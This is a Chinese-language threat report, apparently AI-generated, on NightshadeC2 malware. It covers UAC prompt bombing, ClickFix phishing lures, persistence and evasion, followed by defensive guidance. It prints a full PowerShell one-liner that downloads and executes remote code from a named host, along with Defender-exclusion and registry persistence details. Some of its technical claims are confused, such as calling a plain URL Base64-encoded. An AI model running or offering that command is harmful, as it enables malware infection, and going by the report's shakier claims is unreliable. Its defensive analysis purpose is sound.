NightshadeC2 通过 **.NET 加载器 + PowerShell 循环 **,实现 “UAC 弹窗轰炸”(UAC Prompt Bombing),核心逻辑:
- 循环检测:加载器持续执行
Add-MpPreference -ExclusionPath命令(参考摘要 2 的 ClickFix 修复程序手法),检查 Windows Defender 退出代码(非 0 代表未授权);
- 弹窗施压:若未获权限,反复弹出 UAC 对话框(每 3 秒一次),沙箱环境因无法模拟用户点击陷入无限循环(参考摘要 4 的 UAC 安全桌面机制);
- 权限突破:用户被迫点击 “是” 或 Defender 服务异常时,加载器添加排除项(如
C:\Windows\Temp\payload.exe),放行后续恶意组件。
关键细节:
- 诱饵伪装:钓鱼页高仿Booking.com、Advanced IP Scanner 等可信平台(参考摘要 3 的局域网工具滥用),诱导用户复制
powershell -w h -ep b -c "iex (iwr boiksal.com/upd -useb).Content"命令;
- 无文件执行:核心载荷驻留内存,仅临时文件
payload.exe落地(执行后删除),规避传统文件检测(参考摘要 2 的 Matanbuchus 无文件技术)。
- 场景设计:钓鱼页显示 “验证机器人”“修复 Chrome 错误”(参考摘要 2 的虚假 Chrome 提示),要求用户通过
Win+R执行命令,利用 “系统操作信任” 降低警惕;
- 命令混淆:PowerShell 命令经 Base64 编码(如
boiksal.com/upd),结合-w h隐藏窗口,避免用户察觉(参考摘要 2 的 DarkGate 加载手法)。
- 反分析机制:检测沙箱特征(如
VBoxService.exe进程),触发更激进的弹窗频率(每秒 2 次),迫使沙箱超时终止分析(参考摘要 6 的 UAC 截图绕过策略);
- 代码对抗:加载器含
Wait-RandomDelay随机延迟(0-30 秒),打乱自动化分析时序,增加逆向难度。
- 注册表键值:写入
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\NSUpdate,确保下次开机执行;
- 服务伪装:创建
svchost.exe同名进程(PID 伪造),CPU 占用 < 1%,规避 EDR 基线检测(参考摘要 5 的进程伪装技术)。
- 端口选择:混用 80/443(伪装网页流量)与 7777/33336(游戏端口),绕过企业防火墙端口白名单;
- 加密通信:RC4 密钥硬编码(
Piv@ass!),C2 响应数据经Invoke-RC4解密,避免流量被明文解析(参考摘要 2 的 Matanbuchus 加密通道)。
-
Defender 策略加固:
- 启用 “篡改防护”(Tamper Protection),禁止修改
Add-MpPreference(组策略路径:Computer Configuration\Administrative Templates\Windows Defender Antivirus\Tamper Protection);
- 监控
C:\Windows\Temp目录异常.exe文件,通过 EDR 拦截powershell.exe对Add-MpPreference的高频调用(参考摘要 4 的 UAC 安全选项配置)。
-
UAC 行为阻断:
- 配置组策略禁用 “安全桌面”(
用户账户控制: 提示提升时切换到安全桌面→已禁用),允许 EDR 捕获弹窗行为(参考摘要 6 的 UAC 截图策略);
- 部署安恒 EDR,创建 “UAC 弹窗频率” 基线(默认 < 5 次 / 小时),标记异常高频弹窗(如 10 分钟内 > 20 次)。
-
PowerShell 管控:
- 禁用
-ExecutionPolicy Bypass参数,仅允许签名脚本运行(Set-ExecutionPolicy RemoteSigned);
- 监控
iex(Invoke-Expression)命令,拦截从http://bila[.]skf[.]com等可疑域下载的脚本(参考摘要 2 的 PowerShell 滥用检测)。
-
员工培训:
- 模拟 “验证机器人” 钓鱼场景,强调 “系统操作无需通过浏览器提示”;
- 教育 “三不原则”:不复制陌生 PowerShell 命令、不连续点击 UAC 弹窗、不忽视进程异常(如
powershell.exe高频启动)。
-
威胁狩猎:
- 检查注册表
RunOnce键值,删除含NSUpdate等可疑项;
- 监控
svchost.exe异常子进程,通过Process Explorer验证数字签名(参考摘要 5 的进程分析工具)。
- 感染路径:员工点击高仿 Advanced IP Scanner 的钓鱼链接,运行
Win+R命令后陷入 UAC 轰炸,最终授权导致 M365 凭据泄露;
- 防御缺失:未启用 Defender 篡改防护,EDR 未监控
Add-MpPreference调用,攻击者窃取 200 + 员工邮箱,发起供应链攻击。
- 工具链升级:NightshadeC2 新增对
Advanced IP Scanner内存注入功能,直接劫持局域网扫描结果,植入恶意 IP(参考摘要 3 的局域网工具滥用);
- APT 关联:C2 服务器关联朝鲜 APT 组织 Thallium,攻击目标从个人转向企业核心系统(如 OA、ERP,参考摘要 1 的逻辑炸弹攻击);
- 跨平台扩展:2025 年 9 月发现 Linux 变种,利用
sudo提权实现 “UAC 轰炸”,攻击 Docker 容器环境(新趋势)。
红客联盟 AI 警示:截至 2025 年 9 月,全球仍有58% 的企业未启用 Defender 篡改防护(微软数据)。建议立即开展 “UAC 策略 + PowerShell 监控” 专项整治,对高频 UAC 弹窗行为实施 “自动阻断 + 人工复核”,堵住 “用户疲劳→权限滥用” 的关键漏洞。
(报告生成:红客联盟 AI 智能安全分析员 | 2025 年 9 月 6 日)
版权声明·<<<---红客联盟--->>>>·免责声明
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
联系我们:admin@chnhonker.com
